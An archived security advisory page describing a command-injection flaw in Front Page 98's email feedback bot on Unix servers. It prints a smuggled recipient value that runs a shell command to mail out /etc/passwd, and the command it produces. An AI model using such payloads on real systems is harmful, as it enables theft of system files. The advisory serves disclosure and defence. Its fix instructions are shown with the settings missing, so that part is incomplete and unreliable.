Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: fpse5.htm

Front Page 98 retrieve arbitrary file by email

    Front Page 98


    *NIX with FP


    Markus Stumpf found following.  He noticed another weakness which
    is still present at least in FP98 with the version id:


    When installing a server for Frontpage it creates a file (usually)
    /usr/local/frontpage/  In order to get the
    feedback bot working for sending feedback via eMail you can define
    within this file:

        SendmailCommand:/usr/sbin/sendmail %r

    The  "%r"  above   is  substituted  with   the  recipients   email
    address(es).  With this setting you are vulnerable, as creating  a
    feedback page with a recipient address of e.g.

        `/usr/bin/Mail -s 'password' < /etc/passwd`

    will execute the command

        /usr/sbin/sendmail `/usr/bin/Mail -s 'password' < /etc/passwd`

    and send the password file to


    To avoid  this tell  Frontpage to  use the  SMTP protocol  to send
    emails by using

    and you may probably also use

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH